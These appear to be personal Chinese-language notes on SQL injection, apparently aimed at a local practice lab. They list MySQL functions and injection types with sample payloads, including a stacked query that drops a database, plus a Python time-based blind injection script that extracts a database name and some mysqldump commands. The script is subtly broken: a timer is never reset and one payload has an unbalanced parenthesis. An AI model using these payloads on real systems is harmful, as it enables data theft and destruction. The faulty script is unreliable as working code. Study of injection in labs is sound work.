select database() -- 当前数据库名
select table_name from information_schema.tables where table_schema='mydatabase123'
select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.columns limit 2;
sleep(n) --睡眠n秒
substr(str,start,len) -- 截取mid()、left(str,len)
count(0) -- 统计条数
ascii(str) -- 返回字符ASCII码ord()
length() -- 长度
rand() -- 随机数 rand(0)伪随机
floor(x) -- 向下取整,小于x的整数
extractValue('<a href="sss"></a><a href="2333"></a>','/a!123qwer!@#') -- xpath 解析
Boolean-Base布尔型注入
Union 联合查询注入
Time-Based 基于时间延迟注入
select * from tb_goods where category='Phone-ele' and sleep(2)
Error-Based 报错型注入 floor()、updatexml()、extractvalue()
SELECT extractValue('<a href="sss"></a><a href="2333"></a>','/a~!123qwer!@#');
SELECT updatexml('<a href="sss"></a><a href="2333"></a>','/a:~12345','newValue');
select count(*),concat((select user()),'===',floor(rand(0)*2))x from information_schema.tables group by x ;
Stacked queries 叠堆注入
select * from user; drop database testdb; #
# python
import requests
import time
HEADER = {
"Cookie": "PSE......"
}
BASE_URL = "http://localhost:8080/sqli_15.php"
# 获取数据库长度
def get_database_name_length() -> int:
count = 0
for i in range(100):
url = BASE_URL + "titile=Java' and length(database())={} and sleep(2) -- &action=search".format(i)
start_time = time.time()
requests.get(url, headers=HEADER )
if time.time() - start_time > 1:
print("长度:{}".format(i) )
count = i
return count
# 获取数据库名称
def get_database_name(count):
data = []
for i in range(count+1):
for j in range(33, 127):
url = BASE_URL + "titile=Java' and ascii(substr(database(),{},1)={} and sleep(2) -- &action=search".format(i, j)
requests.get(url, headers=HEADER )
if time.time() - start_time > 1:
print( chr(j) )
data.append( chr(j) )
print(data)
print(''.join(data))
# MAIN入口
if __name__ == '__main__':
get_database_name(get_database_name_length())
mysql备份表testdb.products
mysqldump -uroot -p testdb products > /tmp/aaa.sql
全库备份
mysqldump -uroot -p -A -R -E --triggers --master-data=2 --single-transaction > /tmp/myfull.sql
mysql恢复表testdb.products
mysql> source /tmp/aaa.sql;
TODO... 持续更新中